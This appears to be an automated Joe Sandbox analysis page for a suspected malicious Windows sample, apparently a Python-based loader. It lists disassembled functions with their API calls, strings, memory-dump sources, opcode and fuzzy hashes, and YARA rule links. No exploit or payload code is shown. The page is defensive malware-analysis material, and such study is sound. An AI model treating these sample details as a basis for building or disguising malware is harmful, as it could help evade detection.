Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction ID: fab8920e11336db158a54e81db28b503af548b9439bab134c325a0d5914dcd32
Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction Fuzzy Hash: 41418121B18A8691EB25EB20EC163EAA319FF44340FC04133EB5D43695EFBCE515C362

Function 00007FF8B834FD40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

ERR_new.LIBCRYPTO-3 ref: 00007FF8B834FD62
ERR_set_debug.LIBCRYPTO-3 ref: 00007FF8B834FD7A
ERR_set_error.LIBCRYPTO-3 ref: 00007FF8B834FD8C
ASYNC_get_current_job.LIBCRYPTO-3 ref: 00007FF8B834FDDB

Strings

SSL_do_handshake, xrefs: 00007FF8B834FD67
..\s\ssl\ssl_lib.c, xrefs: 00007FF8B834FD73

Memory Dump Source

Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true

Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd

Similarity

API ID: C_get_current_jobR_newR_set_debugR_set_error
String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
API String ID: 2134390360-2964568172
Opcode ID: 3e19f5133db6f9f0995d995d45ee5f37c3958f709a5efffcd3d50ec949d9a66b
Instruction ID: eac5e0da906434094f5ec637b4fce7e1840e017320c98ef2788103b7e8041eda
Opcode Fuzzy Hash: 3e19f5133db6f9f0995d995d45ee5f37c3958f709a5efffcd3d50ec949d9a66b
Instruction Fuzzy Hash: 77213A22E0868242FA50AB29E9012BE6251EF8DBD4F5C1231EB5D066D6DF3CE5928748

Function 00007FF8B7FEFFD0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF8B7FF020A

Part of subcall function 00007FF8B7FEFA10: memset.VCRUNTIME140 ref: 00007FF8B7FEFA50
Part of subcall function 00007FF8B7FEFA10: memset.VCRUNTIME140 ref: 00007FF8B7FEFADF

Strings

psow, xrefs: 00007FF8B7FF0581
winOpen, xrefs: 00007FF8B7FF047D
exclusive, xrefs: 00007FF8B7FF019B
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8B7FF02E6

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: memset$CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 333288564-3829269058
Opcode ID: 91a16a29fa85a4b7500c484f2e0290924f29dc3ca7676500eb30cdcc977ab085
Instruction ID: eda0393c317d6df5dadb6ac1c8f46ea97a9808f529357d659ef1c001d46216d1
Opcode Fuzzy Hash: 91a16a29fa85a4b7500c484f2e0290924f29dc3ca7676500eb30cdcc977ab085
Instruction Fuzzy Hash: A2026D21A0EB43C6FA649B29A85477973A0FF84BD5F084635DB4E067A4DF7CE446CB08

Function 00007FF7E12D5628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D5655
CreateFileW.KERNEL32 ref: 00007FF7E12D5694
CloseHandle.KERNEL32 ref: 00007FF7E12D56C9

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: e07611010984c9507fef69f2c8b75ea74036e99cd747d787f63fc1a18644f364
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: 2941A363E1878187F714AB20E911369A264FB943A4F509336E69C03AD5DFFCA5E08751

Function 00007FF7E12CCC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12CCE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7E12CCE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7E12CCC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF7E12CCCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7E12CCD21

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 958985c6d6ec0a8b3db471f2ef67f5c222c36460162f58a3485d614efc59f2ee
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: 83310821F0854741EB15BB659C233B99689AF81344FC85037EA0E572D7DEFDA914C363

Function 00007FF7E12D9A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7E12D9A2C), ref: 00007FF7E12D9A41
TerminateProcess.KERNEL32(?,?,?,00007FF7E12D9A2C), ref: 00007FF7E12D9A4C
ExitProcess.KERNEL32 ref: 00007FF7E12D9A5B

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: 4e9ade2ef335731114cf6dcd232dc74199ce15689346e746a6c7639da1021e9a
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: 26D06712B0874642EF553B709C5727892596F48711B94543AD80B4A393DDBDA8494263

Function 00007FF7E12D013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D0180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D0277

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: f0755f2c32e9bafdd37f79b70449d6df1b209dd39095ff0845914522cdaa6ba7
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: F3512E23B0924186E764BA35DC0677EE198BF44BA4F944B32DD6D0B7E5CEBCD4018626

Function 00007FF7E12DC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF7E12DC2CD), ref: 00007FF7E12DC180
GetLastError.KERNEL32(?,?,?,?,?,00007FF7E12DC2CD), ref: 00007FF7E12DC18A

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: ca4881f2439b6a0db14825e5b2976e72329e4b77d3a2dc183c218889a977bddc
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: E911E222708A9281DB20AB25EC01269E365BB41FF4F944336EE7D077D8CEBCD0508701

Function 00007FF8B7FE5B35 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7FE5B40

Strings

failed to allocate %u bytes of memory, xrefs: 00007FF8B7FE5B51

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: be3047ffbf8d3a3382a60741f12f29956a7e97552a5b0cf3e5d2d3eb3c06d507
Instruction ID: afc1c5ad39d51ceafcc808669550a8815489537479c09b5d1d52ae8f27d839a7
Opcode Fuzzy Hash: be3047ffbf8d3a3382a60741f12f29956a7e97552a5b0cf3e5d2d3eb3c06d507
Instruction Fuzzy Hash: 1ED05E94B1E70181EE64675EBA9027A1252AF4CFC1F881034DF1E4B799EE1CE492C70C

Function 00007FF7E12DAB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF7E12DA9D5,?,?,00000000,00007FF7E12DAA8A), ref: 00007FF7E12DABC6
GetLastError.KERNEL32(?,?,?,00007FF7E12DA9D5,?,?,00000000,00007FF7E12DAA8A), ref: 00007FF7E12DABD0

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: f9f5ac7ec8eeb59d3cce01a8abfe12ee8a06950ccdb5c6ab72f0f5f70853a75d
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 3221F612F0C68201FBA47751DC42779928A9F947A0F88463BD92E477C5DEFCE4814322

Function 00007FF7E12DBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DBED4

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 881fb8897f6d56f25c0c034f21346f752949e835b6a4b3ffb2e7b9e118edaf5b
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: C1419933A1824587EB34AA15E952379B3A4FB56751F900132E68E436D1CFBEE442CB62

Function 00007FF7E12C7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7E12C803A

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: eab84e70d576b7cd09f87498ce6b6c6cd9351fe1a4fe93539c16e11a3eadb65b
Instruction ID: dd3463ab9541b6d61e452bc038bc0066947e0b485bf43a05d708a65165750640
Opcode Fuzzy Hash: eab84e70d576b7cd09f87498ce6b6c6cd9351fe1a4fe93539c16e11a3eadb65b
Instruction Fuzzy Hash: 0521A621B1865146FB50BB22AD063BAD659BF45BC4FC98432EF0D0B786CEBDE081C312

Function 00007FF7E12DB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DB9C2

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction ID: 979095f411f82d72718147561d2a045645e09917d5c878a80302cb4a388fb3c5
Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction Fuzzy Hash: 64315B23F1868286E7117B55CC523BCA698BB91B95FD20137E95D037D2CEFDA4418723

Function 00007FF7E12D9961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7E12D998F

Part of subcall function 00007FF7E12D9A88: GetModuleHandleExW.KERNEL32 ref: 00007FF7E12D9AAD
Part of subcall function 00007FF7E12D9A88: GetProcAddress.KERNEL32 ref: 00007FF7E12D9AC3
Part of subcall function 00007FF7E12D9A88: FreeLibrary.KERNEL32 ref: 00007FF7E12D9AEA

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: 53ddbee1291033f0ee23eb03d7878ce34820801dea9375483bd762868ae6f660
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: 08217E72B0474689EF14AF68C8813EC73A8EB04718F844637E75E07A85DFB8E545C752

Function 00007FF7E12D5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D5EF9

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: bc2227f15ee0209f2fbec602c53c91e3ccf383f44c715bb52245c600c7a9a5c0
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 93113363B1864146EB60BF21D802379E278AF95B84F944433EA8C57A95CFFDE4004762

Function 00007FF7E12E6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E6377

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: d0648260a8084942889e47fd337e45bb410f4b071db79b1c47053612288ed481
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: F2212932B08A8187DB62AF18D842379B3A4FB84F54F948236EB6D876D5DF7CD4008B11

Function 00007FF7E12D03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D0410

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 0946c83fcadbf284fe5f66d71f94e3fac3bae1d626e9de2e6949069bcac39978
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 3C018262B0874141EB04AF62DD0266DE6A9EF95FE0F884A32DE5C57BE6CEBCD4014316

Function 00007FF7E12C8E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9

LoadLibraryExW.KERNEL32(?,00007FF7E12C6476,?,00007FF7E12C336E), ref: 00007FF7E12C8EA2

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction ID: 2461bc034c021b5a109fd00357da4c6955ce84c740a2b2d4d4c4cf578db1c639
Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction Fuzzy Hash: 6AD08C01F3428646EF44B767BA4B7299255AB89BC0F88D036EE4D03B5ADC3DD0418B00

Function 00007FF8B8047200 Relevance: 1.3, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FF8B8047B7F), ref: 00007FF8B8047267

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
